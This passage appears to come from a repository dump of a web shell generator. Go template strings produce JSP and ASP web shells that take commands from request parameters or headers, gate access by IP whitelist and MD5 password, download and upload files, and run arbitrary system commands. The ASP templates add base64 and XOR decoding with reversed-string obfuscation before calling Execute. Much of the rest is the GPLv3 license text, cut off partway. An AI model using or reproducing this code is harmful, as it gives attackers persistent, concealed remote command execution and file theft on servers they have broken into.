117 | <%@ page import="java.nio.file.*" %>
118 | {{ end }}
119 | <%
120 | try {
121 | {{/* Get command from param or header */}}
122 | {{ if ne .CmdHeader "" -}}
123 | String {{ index .V "cmd" }} = request.getHeader("{{ .CmdHeader }}");
124 | {{ else if ne .Method "" -}}
125 | String {{ index .V "cmd" }} = request.getParameter("{{ .CmdParam }}");
126 | {{ end }}
127 |
128 |
129 | {{/* Check if ip is in whitelist */}}
130 | {{ if .Whitelist }}
131 |
132 | String[] {{ index .V "whitelist" }} = { {{ .Whitelist }} };
133 | if (!Arrays.asList({{ index .V "whitelist" }}).contains(request.getRemoteAddr())) {
134 | return;
135 | }
136 |
137 | {{ end }}
138 |
139 |
140 | {{/* Check password */}}
141 | {{ if ne .Password "" }}
142 |
143 | String {{ index .V "hash" }} = "{{ .PasswordHash }}";
144 | {{ if ne .PasswordHeader "" }}
145 | String {{ index .V "pass" }} = request.getHeader("{{ .PasswordHeader }}");
146 | {{ else if ne .PasswordParam "" }}
147 | String {{ index .V "pass" }} = request.getParameter("{{ .PasswordParam }}");
148 | {{ end }}
149 |
150 | MessageDigest {{ index .V "alg" }} = MessageDigest.getInstance("MD5");
151 | {{ index .V "alg" }}.reset();
152 | {{ index .V "alg" }}.update({{ index .V "pass" }}.getBytes());
153 | byte[] {{ index .V "digest" }} = {{ index .V "alg" }}.digest();
154 | StringBuffer {{ index .V "hashFunc" }} = new StringBuffer();
155 |
156 | for (int {{ index .V "i" }} = 0; {{ index .V "i" }} < {{ index .V "digest" }}.length; {{ index .V "i" }}++) {
157 | {{ index .V "pass" }} = Integer.toHexString(0xFF & {{ index .V "digest" }}[{{ index .V "i" }}]);
158 | if ({{ index .V "pass" }}.length() < 2) {
159 | {{ index .V "pass" }} = "0" + {{ index .V "pass" }};
160 | }
161 | {{ index .V "hashFunc" }}.append({{ index .V "pass" }});
162 | }
163 |
164 | if (!{{ index .V "hash" }}.equals({{ index .V "hashFunc" }}.toString())) {
165 | return;
166 | }
167 |
168 | {{ end }}
169 |
170 |
171 | {{/* Include file capabilities */}}
172 | {{ if .FileCapabilities }}
173 | {{/* Download file */}}
174 | if ({{ index .V "cmd" }}.length() >= 4 && {{ index .V "cmd" }}.substring(0, 4).equals("get ")) {
175 | String[] {{ index .V "cmdArgs" }} = {{ index .V "cmd" }}.split(" ");
176 | if ({{ index .V "cmdArgs" }}.length >= 2) {
177 | String {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
178 | File {{ index .V "file" }} = new File({{ index .V "filePath" }});
179 | if (!{{ index .V "file" }}.exists()) {
180 | response.setStatus(404);
181 | return;
182 | }
183 | FileInputStream {{ index .V "fileStream" }} = new FileInputStream({{ index .V "file" }});
184 | String {{ index .V "mimeType" }} = getServletContext().getMimeType({{ index .V "filePath" }});
185 | if ({{ index .V "mimeType" }} == null) {
186 | {{ index .V "mimeType" }} = "application/octet-stream";
187 | }
188 | response.setContentType({{ index .V "mimeType" }});
189 | response.setContentLength((int) {{ index .V "file" }}.length());
190 | response.setHeader("Content-Disposition", String.format("attachment; filename=\"%s\"", {{ index .V "file" }}.getName()));
191 |
192 | OutputStream {{ index .V "outStream" }} = response.getOutputStream();
193 | byte[] {{ index .V "buffer" }} = new byte[4096];
194 | int {{ index .V "bytesRead" }} = -1;
195 |
196 | while (({{ index .V "bytesRead" }} = {{ index .V "fileStream" }}.read({{ index .V "buffer" }})) != -1) {
197 | {{ index .V "outStream" }}.write({{ index .V "buffer" }}, 0, {{ index .V "bytesRead" }});
198 | }
199 |
200 | {{ index .V "fileStream" }}.close();
201 | {{ index .V "outStream" }}.close();
202 |
203 | return;
204 | } else {
205 | return;
206 | }
207 | {{/* Upload file */}}
208 | } else if ({{ index .V "cmd" }}.length() >= 4 && {{ index .V "cmd" }}.substring(0, 4).equals("put ")) {
209 | String[] {{ index .V "cmdArgs" }} = {{ index .V "cmd" }}.split(" ");
210 | String {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[1];
211 | if ({{ index .V "cmdArgs" }}.length >= 3) {
212 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}[2];
213 | } else {
214 | File f = new File({{ index .V "filePath" }});
215 | {{ index .V "filePath" }} = f.getName();
216 | }
217 |
218 | String {{ index .V "fileContents" }} = request.getParameter("f");
219 | try {
220 | FileOutputStream {{ index .V "outStream" }} = new FileOutputStream({{ index .V "filePath" }});
221 | {{ index .V "outStream" }}.write(Base64.getDecoder().decode({{ index .V "fileContents" }}));
222 | } catch (IllegalArgumentException e) {
223 | response.setStatus(500);
224 | out.println("Unable to decode base64.");
225 | } catch (IOException e) {
226 | response.setStatus(500);
227 | out.println("Unable to write file");
228 | }
229 | return;
230 | }
231 |
232 | {{ end }}
233 |
234 |
235 | {{/* Run command */}}
236 | Process {{ index .V "process" }} = Runtime.getRuntime().exec({{ index .V "cmd" }});
237 | DataInputStream ds = new DataInputStream({{ index .V "process" }}.getInputStream());
238 | String {{ index .V "output" }} = ds.readLine();
239 | while ( {{ index .V "output" }} != null ) {
240 | out.println({{ index .V "output" }});
241 | {{ index .V "output" }} = ds.readLine();
242 | }
243 | } catch (Exception e) {}
244 | %>
245 | `
246 |
247 | var aspTemplate = `{{/* Get command from param or header */}}
248 | {{/* dim {{ index .V "cmd" }} */}}
249 | {{ if ne .CmdHeader "" }}
250 | {{ index .V "cmd" }} = Request.ServerVariables("HTTP_{{ .CmdHeader }}")
251 | {{ else }}
252 | {{ index .V "cmd" }} = Request("{{ .CmdParam }}")
253 | {{ end }}
254 |
255 | {{/* Check if ip is in whitelist */}}
256 | {{ if .Whitelist }}
257 |
258 | {{ index .V "whitelist" }} = Array({{ .Whitelist }})
259 | for each {{ index .V "i" }} in {{ index .V "whitelist" }}
260 | if {{ index .V "i" }} = Request.ServerVariables("REMOTE_ADDR") Then
261 | Exit For
262 | elseif {{ index .V "i" }} = {{ index .V "whitelist" }}(UBound({{ index .V "whitelist" }})) then
263 | response.end
264 | end if
265 | next
266 | {{ end }}
267 |
268 | {{/* Check password */}}
269 | {{ if ne .Password "" }}
270 | {{/* dim {{ index .V "pass" }} */}}
271 | {{ index .V "hash" }} = "{{ .PasswordHash }}"
272 |
273 | {{ if ne .PasswordHeader "" }}
274 | {{ index .V "pass" }} = Request.ServerVariables("HTTP_{{ .PasswordHeader }}")
275 | {{ else if ne .PasswordParam "" }}
276 | {{ index .V "pass" }} = request("{{ .PasswordParam }}")
277 | {{ end }}
278 | {{/* Hash and compare */}}
279 | {{/* Dim {{ index .V "asc" }}, {{ index .V "alg" }}, {{ index .V "hashFunc" }}, {{ index .V "digest" }}, {{ index .V "i" }} */}}
280 |
281 | Set {{ index .V "asc" }} = CreateObject("System.Text.UTF8Encoding")
282 | Set {{ index .V "alg" }} = CreateObject("System.Security.Cryptography.MD5CryptoServiceProvider")
283 | {{ index .V "hashFunc" }} = {{ index .V "asc" }}.GetBytes_4({{ index .V "pass" }})
284 | {{ index .V "hashFunc" }} = {{ index .V "alg" }}.ComputeHash_2(({{ index .V "hashFunc" }}))
285 | {{ index .V "digest" }} = ""
286 | For {{ index .V "i" }} = 1 To LenB({{ index .V "hashFunc" }})
287 | {{ index .V "digest" }} = {{ index .V "digest" }} & LCase(Right("0" & Hex(AscB(MidB({{ index .V "hashFunc" }}, {{ index .V "i" }}, 1))), 2))
288 | Next
289 |
290 | if {{ index .V "digest" }} <> {{ index .V "hash" }} Then
291 | response.end
292 | end if
293 | {{ end }}
294 |
295 | {{/* Include file capabilities */}}
296 | {{ if .FileCapabilities }}
297 | On Error Resume Next
298 |
299 | {{/* Download file */}}
300 | if Left({{ index .V "cmd" }}, 4) = "get " Then
301 | {{/* dim {{ index .V "cmdArgs" }} */}}
302 | {{ index .V "cmdArgs" }} = Split({{ index .V "cmd" }}, " ")(1)
303 |
304 | {{/* Dim {{ index .V "fs" }}
305 | Dim {{ index .V "file" }}
306 | Dim {{ index .V "fileStream" }} */}}
307 |
308 | Set {{ index .V "fs" }} = Server.CreateObject("Scripting.FileSystemObject")
309 | If {{ index .V "fs" }}.FileExists({{ index .V "cmdArgs" }}) Then
310 | Set {{ index .V "file" }} = {{ index .V "fs" }}.GetFile({{ index .V "cmdArgs" }})
311 |
312 | Response.Clear
313 | Response.AddHeader "Content-Disposition", "attachment; filename=" & {{ index .V "file" }}.Name
314 | Response.AddHeader "Content-Length", {{ index .V "file" }}.Size
315 | Response.ContentType = "application/octet-stream"
316 |
317 | Set {{ index .V "fileStream" }} = Server.CreateObject("ADODB.Stream")
318 | {{ index .V "fileStream" }}.Type = 1
319 | {{ index .V "fileStream" }}.Open
320 | {{ index .V "fileStream" }}.LoadFromFile({{ index .V "cmdArgs" }})
321 |
322 | Response.BinaryWrite({{ index .V "fileStream" }}.Read)
323 | {{ index .V "fileStream" }}.Close
324 | If Err.Number <> 0 Then
325 | Response.Clear
326 | Response.Status = 500
327 | Response.Write Err.Description
328 | Response.End
329 | End If
330 |
331 | Set {{ index .V "fileStream" }} = Nothing
332 | Set {{ index .V "file" }} = Nothing
333 | Else '{{ index .V "fs" }}.FileExists({{ index .V "cmdArgs" }})
334 | Response.Clear
335 | Response.Status = 404
336 | Response.Write("File not found.")
337 | End If
338 |
339 | Set {{ index .V "fs" }} = Nothing
340 | response.end
341 |
342 | {{/* Upload file */}}
343 | elseif Left({{ index .V "cmd" }}, 4) = "put " Then
344 | {{ index .V "cmdArgs" }} = Split({{ index .V "cmd" }}, " ")
345 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}(1)
346 | set {{ index .V "fs" }}=Server.CreateObject("Scripting.FileSystemObject")
347 | If ubound({{ index .V "cmdArgs" }}) > 1 Then
348 | {{ index .V "filePath" }} = {{ index .V "cmdArgs" }}(2)
349 | Else
350 | {{ index .V "filePath" }}={{ index .V "fs" }}.getfilename({{ index .V "filePath" }})
351 | End If
352 | response.write {{ index .V "filePath" }}
353 |
354 | set {{ index .V "encSrc" }} = CreateObject("Msxml2.DOMDocument").CreateElement("aux")
355 | {{ index .V "encSrc" }}.DataType = "bin.base64Var"
356 | {{ index .V "encSrc" }}.Text = Request("f")
357 | set {{ index .V "fileContents" }} = CreateObject("ADODB.Stream")
358 | {{ index .V "fileContents" }}.Type = 1 ' adTypeBinary
359 | {{ index .V "fileContents" }}.Open
360 | {{ index .V "fileContents" }}.Write {{ index .V "encSrc" }}.NodeTypedValue
361 | {{ index .V "fileContents" }}.Position = 0
362 | {{/* {{ index .V "fileContents" }}.Type = 2 ' adTypeText */}}
363 | {{ index .V "fileContents" }}.CharSet = "utf-8"
364 | set {{ index .V "file" }}={{ index .V "fs" }}.CreateTextFile("C:\inetpub\wwwroot\nice.php",true)
365 | {{ index .V "file" }}.write {{ index .V "fileContents" }}.ReadText
366 | response.end
367 | end if
368 | {{ end }}
369 |
370 | {{/* Run command */}}
371 | Set {{ index .V "process" }} = CreateObject("WScript.Shell").exec("cmd /c " & {{ index .V "cmd" }})
372 | Response.Write({{ index .V "process" }}.StdOut.ReadAll)
373 |
374 |
375 |
376 | {{- define "b64" }}
377 | {{/* Dim {{ index .V "encObj" }}, {{ index .V "b64" }}, {{ index .V "binStream" }} */}}
378 | {{ index .V "base64Var" }} = "46"
379 | {{ index .V "msxmlVar" }} = "tnEmu" & "CoD"
380 | {{ index .V "msxmlVar" }} = "0.3." & {{ index .V "msxmlVar" }} & "mod"
381 | {{ index .V "msxmlVar" }} = {{ index .V "msxmlVar" }} & ".2l"
382 | {{ index .V "msxmlVar" }} = {{ index .V "msxmlVar" }} & "mXs"
383 | Set {{ index .V "encObj" }} = CreateObject(strreverse({{ index .V "msxmlVar" }} & "m"))
384 | {{ index .V "base64Var" }} = {{ index .V "base64Var" }} & "esab"
385 | Set {{ index .V "b64" }} = {{ index .V "encObj" }}.CreateElement(strreverse({{ index .V "base64Var" }}))
386 | {{ index .V "b64" }}.dataType = "bin." & strreverse({{ index .V "base64Var" }})
387 | {{ index .V "b64" }}.text = "{{ .EncCode }}"
388 | Set {{ index .V "binStream" }} = CreateObject("ADODB.Stream")
389 | {{ index .V "binStream" }}.Type = 1
390 | {{ index .V "binStream" }}.Open
391 | {{ index .V "binStream" }}.Write {{ index .V "b64" }}.nodeTypedValue
392 | {{ index .V "binStream" }}.Position = 0
393 | {{ index .V "binStream" }}.Type = 2
394 | {{ index .V "binStream" }}.CharSet = "us-ascii"
395 | Execute({{ index .V "binStream" }}.ReadText)
396 | {{ end }}
397 |
398 |
399 |
400 | {{ define "xor" -}}
401 | {{ if ne .EncHeader "" -}}
402 | {{ index .V "encKey" }} = Request.ServerVariables("HTTP_{{ .EncHeader }}")
403 | {{ else }}
404 | {{ index .V "encKey" }} = Request("{{ .EncParam }}")
405 | {{ end -}}
406 |
407 | {{ index .V "cmd" }} = "{{ .EncCode }}"
408 | {{/* Dim {{ index .V "encObj" }}, {{ index .V "b64" }}, {{ index .V "binStream" }}, {{ index .V "keyChar" }}, {{ index .V "i" }} */}}
409 | Set {{ index .V "encObj" }} = CreateObject("Msxml2.DOMDocument.3.0")
410 | Set {{ index .V "b64" }} = {{ index .V "encObj" }}.CreateElement("base64Var")
411 | {{ index .V "b64" }}.dataType = "bin.base64Var"
412 | {{ index .V "b64" }}.text = {{ index .V "cmd" }}
413 | Set {{ index .V "binStream" }} = CreateObject("ADODB.Stream")
414 | {{ index .V "binStream" }}.Type = 1
415 | {{ index .V "binStream" }}.Open
416 | {{ index .V "binStream" }}.Write {{ index .V "b64" }}.nodeTypedValue
417 | {{ index .V "binStream" }}.Position = 0
418 | {{ index .V "binStream" }}.Type = 2
419 | {{ index .V "binStream" }}.CharSet = "us-ascii"
420 | {{ index .V "cmd" }} = {{ index .V "binStream" }}.ReadText
421 | for {{ index .V "i" }} = 1 to Len({{ index .V "cmd" }})
422 | if {{ index .V "i" }} Mod Len({{ index .V "encKey" }}) = 0 then
423 | {{ index .V "keyChar" }} = asc(Right({{ index .V "encKey" }},1))
424 | Else
425 | {{ index .V "keyChar" }} = asc(mid({{ index .V "encKey" }},{{ index .V "i" }} Mod Len({{ index .V "encKey" }}),1))
426 | end if
427 | {{ index .V "keyChar" }} = asc(mid({{ index .V "cmd" }},{{ index .V "i" }},1)) Xor {{ index .V "keyChar" }}
428 | wow = wow & Chr({{ index .V "keyChar" }})
429 | next
430 | Execute(wow)
431 | {{ end }}
432 | `
433 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
